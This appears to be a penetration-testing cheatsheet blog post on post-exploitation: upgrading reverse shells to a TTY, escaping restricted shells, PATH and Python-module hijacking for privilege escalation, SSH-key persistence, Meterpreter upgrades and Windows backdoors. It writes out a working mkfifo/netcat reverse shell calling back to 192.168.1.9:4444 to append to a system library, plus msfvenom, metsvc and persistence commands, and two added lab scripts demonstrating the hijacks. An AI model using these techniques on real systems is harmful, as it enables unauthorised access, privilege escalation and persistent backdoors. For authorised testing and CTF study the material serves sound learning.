Pentest Cheatsheet
This post is a collection of techniques that tend to be useful during an engagement.
For a port-by-port pentesting guide, click here.
TTY Reverse Shell
Having a proper interactive TTY matters: in a bare reverse shell, Ctrl + C is delivered to our listener rather than to the remote command, so it kills the connection; there is no tab completion of commands or paths, no command history, error output may never reach us, and interactive programs such as su, ssh or text editors refuse to run without a terminal. Upgrading the shell fixes all of that.
To upgrade it:
# IN REMOTE COMPUTER (inside the reverse shell)
python -c 'import pty; pty.spawn("/bin/bash")'
# Or
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl + Z
# This suspends the reverse shell and drops us back into our own terminal
# IN OUR COMPUTER
stty raw -echo # Our terminal now passes every keystroke (Ctrl + C included) straight through to the remote shell instead of interpreting it; what we type is no longer echoed
fg # Bring the reverse shell back to the foreground (typed blind, nothing is echoed)
# IN REMOTE COMPUTER
reset
# If it asks for the terminal type use: xterm-256color
export SHELL=bash
export TERM=xterm-256color
# Optional: give the remote side the real size of our terminal (read it locally with: stty -a)
stty rows <ROWS> cols <COLS>
And that’s how you get TTY.
Bypassing restricted shells via SSH:
If the restriction comes only from the user's login shell (rbash, for instance), asking sshd to run a command instead of starting the login shell interactively gets around it:
ssh -t <user>@<IP> bash
The command bash is still launched through the restricted login shell, but it is a bare name found in PATH, so rbash lets it run and we land in an unrestricted bash (-t requests a TTY so the session is interactive). This does not help when sshd itself enforces the restriction with ForceCommand in sshd_config.
Path Hijacking
Sometimes a program executed as part of a routine (a cron job, a systemd unit, a daemon, a SUID binary...) calls other commands by bare name instead of by absolute path.
# Absolute Path
/bin/bash
# Relative Path
bash
A command called by bare name is resolved by searching the directories listed in PATH from left to right and taking the first match. If we can make a directory we control come first in the PATH of the process that runs the routine, our fake bash (or whatever command the routine calls) runs instead of the real one.
# PATH example
/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/snap/bin
This can be done with:
export PATH=$(pwd):$PATH
For example, if a cron job running as root calls fdisk by its bare name and the PATH that job uses contains a directory we can write to, creating an executable file called fdisk there (a reverse shell, for instance) gets it executed as root the next time the job fires. Note that export PATH=$(pwd):$PATH only changes our own environment: it works against SUID binaries that we launch and that call commands by bare name, whereas a cron job takes its PATH from the crontab or from the script itself, so for cron we need a writable directory that is already on that PATH.
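A self-contained lab for the hijack described above, added here as an example (it is not part of the original post). It builds a throwaway "routine" that calls fdisk by bare name, drops a fake fdisk into a directory we control, checks where fdisk now resolves to, and runs the routine once with that directory prepended to PATH (what export PATH=$(pwd):$PATH does) and once with the normal PATH. The function names, the marker file and the routine script are constructed for the demo; nothing needs root.

```shell
#!/bin/sh
# Added example, not from the original post. Lab for relative-path (PATH)
# hijacking: everything lives under a mktemp directory.

# Build the lab; prints its directory.
setup_lab() {
    lab=$(mktemp -d) || return 1
    mkdir "$lab/hijack" "$lab/routine"

    # The "routine" (constructed): calls fdisk by bare name, like a sloppy cron script.
    cat > "$lab/routine/disk_check.sh" <<'EOF'
#!/bin/sh
fdisk -l >/dev/null 2>&1
echo "routine done"
EOF
    chmod 755 "$lab/routine/disk_check.sh"

    # Our fdisk. On an engagement this is the reverse shell; here it just
    # records who ran it and which PATH it inherited ($lab is expanded now,
    # the escaped variables when the fake fdisk runs).
    cat > "$lab/hijack/fdisk" <<EOF
#!/bin/sh
echo "fdisk hijacked: uid=\$(id -u) PATH=\$PATH" > "$lab/marker"
EOF
    chmod 755 "$lab/hijack/fdisk"
    echo "$lab"
}

# Which file does "fdisk" resolve to once our directory leads PATH?
# Same check you would run on the target: command -v fdisk (or which fdisk).
resolve_with_hijack() {
    ( PATH="$1/hijack:$PATH"; command -v fdisk )
}

# Run the routine; $2 is "hijack" (our dir first in PATH) or "clean".
# Prints "hijacked" if our fdisk ran, "clean" otherwise.
run_routine() {
    lab=$1
    rm -f "$lab/marker"
    if [ "$2" = hijack ]; then
        PATH="$lab/hijack:$PATH" "$lab/routine/disk_check.sh" >/dev/null 2>&1
    else
        "$lab/routine/disk_check.sh" >/dev/null 2>&1
    fi
    if [ -f "$lab/marker" ]; then echo hijacked; else echo clean; fi
}

demo() {
    lab=$(setup_lab) || exit 1
    echo "fdisk resolves to: $(resolve_with_hijack "$lab")"
    echo "with our dir first in PATH: $(run_routine "$lab" hijack)"
    cat "$lab/marker"
    echo "with the normal PATH:       $(run_routine "$lab" clean)"
    rm -rf "$lab"
}

demo
```

The control run with the normal PATH is the part worth keeping in mind on a real target: if the marker is not written, the routine is not using a PATH you influence, and the trick must move to a SUID binary you execute yourself or to a directory that the job's PATH already contains.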
Python modules Hijacking
This involves modifying or replacing a library that a Python script requires so that it executes our code.
Let’s say I have this script that is owned by another user:
#!/usr/bin/python
import os
print("Hello my friend!")
If this script runs from a cron job (or is otherwise executed by that user), we can make it run our code as that user.
How?
Since the shebang calls python rather than python3, the module it loads is the Python 2 one, normally /usr/lib/python2.7/os.py. The reliable way to locate it is to ask that same interpreter where os.__file__ points, and then check with ls -l whether the file or its directory is writable by us.
We can alter the behaviour of the script by:
- Modifying the os library: if we have write access to the file, we simply append our code at its end.
- Replacing the os library: we may not have write access to the file but to the folder. In that case we create a test.py containing the original module plus our code at the end, and then swap it in (renaming only needs write permission on the directory, even when the file itself is read-only to us):
mv test.py os.py
The code we can append to the os library to run something else could be (the reverse shell below is the page's, calling back to 192.168.1.9:4444, where our listener must already be waiting):
import os
# HERE THE CODE: a mkfifo-based reverse shell
os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.9 4444 >/tmp/f")
Then, the next time the cron job runs the script, we get a reverse shell as the script's owner.
An example of privilege escalation with this method is the Friendzone HTB machine.
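A throwaway lab for the technique above, added as an example (not code from the original post). It shows the other side of the same coin: Python searches the directory containing the script (sys.path[0]) before the standard library, so a writable script directory is enough to shadow any module the script imports, with no need to touch /usr/lib. The victim imports base64 instead of os on purpose: os is already loaded before the script starts (and frozen into the interpreter on Python 3.11 and later), so it cannot be shadowed this way, which is why the page goes after the real file on disk. The probe script is the check a practitioner wants, the same thing as running python -c 'import os; print(os.__file__)' on the target. The victim, replacement module, probe and marker file are all constructed for the demo; note that Python 3.11's -P flag (or PYTHONSAFEPATH) disables the sys.path[0] behaviour and defeats it.

```shell
#!/bin/sh
# Added example, not from the original post. Lab for Python module
# hijacking via the script directory. Everything lives under a mktemp dir.

PY=$(command -v python3 || command -v python)

# Build the lab; prints its directory.
setup_pylab() {
    lab=$(mktemp -d) || return 1
    mkdir "$lab/clean"

    # The victim (constructed), modelled on the page's script: imports a
    # module it never even uses.
    cat > "$lab/victim.py" <<'EOF'
import base64
print("Hello my friend!")
EOF

    # Our replacement module. On an engagement the payload goes here; the
    # marker file stands in for it.
    cat > "$lab/base64.py" <<'EOF'
import os
here = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(here, "marker"), "w") as f:
    f.write("hijacked by " + os.path.join(here, "base64.py") + "\n")
EOF

    # Probe: which file did "import base64" actually load, and is it ours?
    cat > "$lab/probe.py" <<'EOF'
import base64, os, sys
here = os.path.dirname(os.path.abspath(__file__))
loaded = os.path.dirname(os.path.abspath(base64.__file__))
origin = "local" if os.path.samefile(here, loaded) else "stdlib"
sys.stdout.write(origin + " " + base64.__file__ + "\n")
EOF
    cp "$lab/probe.py" "$lab/clean/probe.py"   # same probe, no shadow module beside it
    echo "$lab"
}

# Run the victim; prints "hijacked" if our module ran, "clean" otherwise.
run_victim() {
    rm -f "$1/marker"
    "$PY" "$1/victim.py" >/dev/null
    if [ -f "$1/marker" ]; then echo hijacked; else echo clean; fi
}

# Where does base64 come from for a script living in $1?
# Prints "local <path>" or "stdlib <path>".
module_origin() {
    "$PY" "$1/probe.py"
}

demo() {
    lab=$(setup_pylab) || exit 1
    echo "victim next to our base64.py: $(run_victim "$lab")"
    cat "$lab/marker"
    echo "probe from $lab:       $(module_origin "$lab")"
    echo "probe from $lab/clean: $(module_origin "$lab/clean")"
    rm -rf "$lab"
}

demo
```

The probe from the clean directory reports the standard-library path; the one beside our file reports local. Run the equivalent one-liner as the target user, from the directory the cron job runs in, before deciding which file to modify.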
How not to lose a shell
If SSH is available we can copy our public key (usually ~/.ssh/id_rsa.pub or ~/.ssh/id_ed25519.pub) to the server, appending it to that user's ~/.ssh/authorized_keys. From then on we can SSH in as that user with our private key and no password, which survives the reverse shell dying. With sshd's default StrictModes, the remote ~/.ssh directory must be mode 700 and authorized_keys 600, or the file is ignored.
If we have no key pair yet, running ssh-keygen creates one.
Reverse Shell to Meterpreter
1st way
We can upgrade a reverse shell to Meterpreter by generating a Meterpreter payload with msfvenom, uploading it and running it on the target (for a reverse payload, LHOST and LPORT are where we listen):
msfvenom -p <PAYLOAD> LHOST=<OUR IP> LPORT=<OUR PORT> -f <FORMAT> > <FILE>.<EXTENSION>
A good reference for msfvenom use is this page.
Then we upload it through whatever the machine offers: an upload form, curl, wget, netcat, scp, ftp, PowerShell... it's up to you.
Once uploaded, we start the handler first and then run the file to get the Meterpreter:
# ON MSFCONSOLE
use exploit/multi/handler
set payload <PAYLOAD USED IN MSFVENOM>
set LHOST <LISTENING IP>
set LPORT <LISTENING PORT>
run
And that should get us the Meterpreter shell.
2nd way
We can upload another reverse shell, this time a plain command-shell payload (the cmd/... family) rather than Meterpreter. When the shell session comes in:
# Put the session in the background
background
# Upgrade the shell session to Meterpreter (this opens a new session; the old one stays)
sessions -u <ID OF THE SHELL SESSION>
# List the sessions so we pick the right one
sessions -l
# Select the one whose type is meterpreter
sessions -i <MET. SESSION>
And there we are again.
Meterpreter on SSH
When we have a username and password, and wget or curl are blocked on the target, we can get a session over SSH with a Metasploit module and upgrade it, or simply move files with scp:
# Start msf
msfconsole
# Use the module
use auxiliary/scanner/ssh/ssh_login
# Set parameters
set rhosts <remote ip>
set username <user>
set password <pass>
# Run it: a valid login opens a shell session
run
# After the session is created, upgrade it to Meterpreter
sessions -u <session>
Backdoor
A backdoor is a persistent remote connection: we can get back into the machine after we disconnect or after it reboots, because something on it keeps listening for us or keeps connecting back to us. There are service backdoors, web shells...
- Pupy.
- Tennc - Webshells
- xl7dev - Webshells
- Bartblaze - PHP
- Mattiasgeniar - PHP
- Meterpreter: on Windows we can migrate the Meterpreter into another process and then make it persistent by installing a service:
# IN METERPRETER
ps
# TAKE THE PID OF EXPLORER.EXE (WINDOWS)
migrate <PID>
run metsvc
Or we can run:
# IN METERPRETER
run persistence -A -L c:\\ -X -i <SECS> -p <PORT> -r <LHOST>
# -X installs the payload to start at boot, -i <SECS> makes it retry the connection every SECS seconds,
# -A starts a matching handler for us, -L is where the payload is written on the target
Either way we have a way back in: metsvc leaves a service listening on the target, persistence makes the target connect back to us. Both scripts are old and marked deprecated in current Metasploit in favour of the post/windows/manage/persistence_exe module, but they show the idea.